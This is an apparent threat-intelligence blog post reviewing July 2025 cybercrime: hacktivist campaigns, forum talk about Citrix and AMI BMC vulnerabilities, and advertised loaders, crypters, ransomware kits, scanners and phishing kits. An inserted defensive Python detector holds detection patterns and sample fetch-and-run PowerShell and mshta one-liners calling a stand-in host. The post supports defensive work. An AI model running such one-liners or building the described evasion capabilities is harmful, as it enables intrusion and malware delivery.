KELA Cybercrime Update: July 2025 Snapshot | KELA Cyber



KELA reveals key cybercrime trends, from pro-Russian hacktivist attacks to advanced payload loaders and active vulnerabilities. This blog series highlights the latest threats shaping the cybercrime landscape. Stay updated with KELA’s expert insights.

By KELA Cyber Intelligence Center

Updated August 12, 2025


From the pro-Russian hacktivist groups to advanced loaders for stealthy payload delivery, KELA has captured the latest tools, services, and cybercriminal trends emerging on the dark web.

In this inaugural post of KELA's new blog series, we’ll dive into the evolving landscape of cybercrime in July 2025, highlighting the most significant threats, including ransomware delivery systems, phishing tools, and the shifts in hacktivism, alongside active vulnerabilities currently fueling cybercriminal activity.




Hacktivist Activity 

The most active hacktivist groups claiming attacks in their Telegram channels were those involved in a joint operation against Israel (#OpIsrael), as well as the pro-Palestinian and Southeast Asian hacktivist teams Tengkorak Cyber Crew, Laskar Pembebasan Palestina, Cyber Isnaad Front, Z-Pentest Alliance, Malaysia Hacktivist Cyber Team and Malaysia Hacktivist, and the pro-Russian NoName057(16).

These groups had the most domains in their messages (presumably victims’ domains), a pattern associated with claimed DDoS and defacement, data theft, and other attacks. The following groups were specifically claiming the most DDoS attacks (based on the attacked websites’ accessibility reports provided as proof): NoName057(16), Z-Pentest Alliance, Mr Hamza, Anonymous VNLBN, Team Fearless, and Resistance Squad. 

The hacktivist activity demonstrated both persistence and tactical evolution across ideological lines. Pro-Russian group NoName057(16) continued operations despite law enforcement crackdowns, targeting digital infrastructure in France and Germany under #OpFrance and #OpGermany, and maintaining a presence through alternative Telegram channels.

Meanwhile, Cyber Partisans deployed Telegram-controlled malware and wipers in attacks against Russian and Belarusian networks. Other groups, including 313Team and Liwaa Mohammad, released custom malware and ransomware variants, further reflecting a potential shift towards more advanced techniques. However, it is not clear how sophisticated this malware is.





Vulnerabilities Chatter 

Over the past month, KELA has observed active discussions on cybercrime forums concerning vulnerabilities disclosed in 2024 and 2025, indicating continued interest in these flaws. One thread focused on CVE-2025-5777, an out-of-bounds read vulnerability affecting Citrix. An actor shared a link to a public PoC hosted on GitHub, noting it was not practical and asking for help, to which others responded with suggestions to improve the PoC.

Additional discussion centered on CVE-2024-54085, an authentication bypass vulnerability in AMI’s SPx BMC. An actor was searching for a public PoC, while another commented with a GitHub page linked to the exploit and claimed it appears to be in use, though provided no further detail and stated they had not personally tested it. There is no indication that the original actor who requested the PoC successfully obtained or used it.

Discussions also focused on zero-day exploits. One actor advertised a Joomla! 5.3.2 shell upload exploit for sale, priced at 0.65 BTC via escrow. The actor, operating under the handle "Wests11", has a history of offering similar exploits, including one previously targeting WordPress, though some users in the thread questioned their credibility. Another actor claimed to be selling an exploit for USD 40,000, targeting BUK TS-G gas pumps with online Human-Machine Interface (HMI) panels, developed by Russian manufacturer Nefteprodukttekhnika.

The vulnerability allegedly allows remote authentication bypass, giving attackers full administrative access to the pump control panel. This includes the ability to manipulate inventory, change configurations, and disable services. The seller claims over 50 publicly accessible devices are vulnerable, with a likely broader impact on privately hosted systems. Additional proof and access to images are offered via private messages or Telegram.




Cybercrime Services 

This month, KELA has uncovered a variety of new offerings, including advanced payload loaders, code obfuscation services, ransomware-as-a-service platforms, and more. Below, we’ll explore the key services and their potential impact on cybersecurity. 

Advanced Loader for Payload Delivery

KELA identified “Beaconism”, an advanced loader for stealthy payload delivery and EDR/XDR evasion, offering two position-independent frameworks (Native x64 and Beacon x64) to avoid traditional C2 solutions. It employs sophisticated evasion techniques like full IAT fixing and obfuscation, spoofed thread execution, and sleep obfuscation. The system also includes official Beaconism Beacons for .NET x64 execution with custom AES encryption, AMSI patch, and EAT Hooking for ETW patch.

The core loader is built for evasion with EV signatures, indirect syscalls, no RWX memory, NTDLL and KERNEL32 unhooking, and triple Anti-VM layers. For APT-grade persistence, it uses NT AUTHORITY tokens for SID retrieval and registry-based persistence via indirect syscalls, avoiding cmd.exe or PowerShell. Beaconism is priced at $2,000 per month for 5 slots.


Code Obfuscation Service

An "undetectable" code obfuscation service designed to bypass Anti-Virus (AV) and EDR systems at both scan time and runtime for executable files was also advertised. This service utilizes multi-level code obfuscation and encryption along with binary mutation during encryption to create unique, signature-evading results.

It provides an adaptive evasion level and conducts complete control flow graph morphing to defeat static analysis, while also using low-level thread manipulation and API call spoofing to disrupt heuristic analysis. Verified on over 50 antivirus systems, this crypting service will not function in CIS countries. The cost for this service is $40.

Advanced Encryptor-Decryptor System

A comprehensive Advanced Encryptor-Decryptor System is available as a complete kit with full source code for the encoder, decoder, and builder, leveraging robust cryptography (curve25519/XChaCha20/blake3) with a unique secret key per file, making recovery impossible without the embedded key. It features a cryptographically strong Pseudo-Random Number Generator (PRNG) and supports flexible file encryption (full or chunk-based) and flexible filtering.

The system supports a wide range of operating systems and architectures, including Windows (Win7-Win11, WinServer2008-WinServer2025 across i686/x86_64/aarch64), various *nix systems, BSD, and ESXi (versions 3.5-8).

Windows builds include automatic privilege escalation (UAC bypass to SYSTEM), service termination, Volume Shadow Copy removal, Windows Recycle Bin cleanup, mounting of unallocated disk partitions, processing of network shares, and termination of processes holding files. *nix builds support background operation, ESXi VM-killer functionality, and removal of ESXi virtual machine snapshots. The builder component is fully offline and generates a new secret key for each iteration. This system is priced at $30,000 in BTC/XMR.

Kryptina v4.0

KELA has identified Kryptina v4.0, a Ransomware-as-a-Service (RaaS) platform, whose current version is designed to be extremely fast and lightweight, with a payload size as small as 20 KB, and boasts a clean, functional web and command-line interface. It offers a powerful REST API exposing all core features for easy extension and workflow automation, supporting both 32-bit and 64-bit systems with static and dynamic linking.

Kryptina employs a combined blacklist and whitelist approach for file targeting and features a robust administrative web interface that includes a team-based design allowing operators to share targets and communicate via a real-time chat, with a strong focus on stealth, operational security, and robust activity logging. The price for Kryptina v4.0 and newer versions is $1,000. As of now, KELA observed no notable engagement with this post.


SpecScan Target Scanner

A high-performance target scanner named SpecScan has been observed, developed in Go to ensure excellent speed when scanning large lists of URLs and IP:ports. This tool is designed to find new targets that may not be readily available on public scanners like Shodan, Fofa, or ZoomEye. SpecScan supports YAML templates for precise identification of various web services and applications, including RDWeb, OWA, Forti, Cisco, WordPress, and Magento, with the flexibility to quickly add or modify templates for specific needs. It runs on Windows with minimal requirements and is available for $50 per month. 

Cross-Platform Software for Obtaining Corporate VPN Access

KELA has identified cross-platform software for obtaining corporate VPN access, with prices starting at $300 per vendor. The software is written in Go, allowing for unlimited runs without license ties. It offers both scanner and bruteforcer modes for vendors such as Cisco and Forti, supporting multiple proxy types (HTTP and SOCKS) and including honeypot protection.

The tool provides a GUI for Windows users and a CLI version compatible with all operating systems, with the GUI-less version provided as a bonus. The developer guarantees free updates for at least three months and offers a demo version for testing. 

Win + R CAPTCHA Bypass Tool

KELA observed an advertised Win + R CAPTCHA bypass tool, designed for automated file download and execution after the victim clicks a CAPTCHA checkbox. This tool features a minimalist admin panel, clean PHP code with a focus on stability and security, and is compatible with all recent browser versions. It allows for uploading multiple dropper files for randomness and offers extensive customization for landing pages, including support for WordPress with admin filtering.

While the tool requires the user to supply "good droppers," it promises significantly higher profit compared to command-line CAPTCHA solutions and is priced at $1,200 per license. 
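Tools of this kind rely on the victim launching a fetch-and-run one-liner from the Windows Run box (Win + R), so those launches are children of explorer.exe. The following triage heuristic, an added example that is not part of KELA's post or of any product, scores constructed process-creation events in a simplified key=value format (the field names host, parent, image and cmd are assumptions) and flags the ones that combine a Run-box-style parent with download-and-execute traits.

```python
# Added example (not from the original post): triage Windows process-creation
# events for Run-box (Win+R) lures. The event format and field names below are
# assumptions made for this illustration, not any vendor's schema.
import re

# Interpreters and LOLBins typically pasted into the Run box by such lures.
SUSPECT_IMAGES = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                  "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe")

# Command-line traits of a download-and-run one-liner.
TRAITS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(indow(style)?)?\s+hidden|/min", re.I),
    "encoded_cmd": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_exec": re.compile(
        r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I),
}

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Parse 'k=v k2="v with spaces"' into a dict (quoted or bare values)."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}

def score_event(ev):
    """Return (score, reasons); a score of 2 or more is worth an analyst's look."""
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    parent = ev.get("parent", "").lower().rsplit("\\", 1)[-1]
    reasons = []
    # Run-box launches arrive as direct children of explorer.exe.
    if image in SUSPECT_IMAGES and parent == "explorer.exe":
        reasons.append("lolbin_from_explorer")
    reasons += [name for name, rx in TRAITS.items() if rx.search(ev.get("cmd", ""))]
    return len(reasons), reasons

def triage(lines):
    """Return (host, image, reasons) for every event scoring 2 or more."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= 2:
            hits.append((ev.get("host"), ev.get("image"), reasons))
    return hits

# Constructed sample events: two lure-style launches, two benign ones.
SAMPLE_EVENTS = [
    r'host=WS01 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmd="mshta http://example.invalid/verify.hta"',
    r'host=WS02 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -w hidden -c iex(iwr http://example.invalid/x)"',
    r'host=WS03 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmd="notepad C:\Users\a\notes.txt"',
    r'host=SRV01 parent="C:\Windows\System32\svchost.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -File C:\Scripts\backup.ps1"',
]

if __name__ == "__main__":
    for host, image, reasons in triage(SAMPLE_EVENTS):
        print(host, image, reasons)
```

The score threshold keeps a scheduled PowerShell script or a plain Run-box launch of notepad out of the queue, while a URL-bearing mshta launch from explorer.exe is surfaced.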

CC+3DS Phishing Script

A CC+3DS phishing script is being sold, which includes a Stripe-based payment system to capture card details and bank SMS. The comprehensive package supports 27 languages, comes with an abuse-resistant server, domain, and SSL, and provides detailed guides for creating fake shops and for SEO/promotion across platforms like Google, Facebook, and Reddit. The seller offers various purchase options, including a fully set-up shop and assistance with ad campaigns, along with 14 days of 24/7 support.





The activity and services highlighted in this month’s review represent just a fraction of the ongoing innovations within the cybercrime ecosystem. By understanding these threats, security professionals can better prepare their defenses and respond proactively to emerging risks.

Stay tuned for next month’s update, where we’ll continue to track and analyze the newest cybercrime threats and trends.
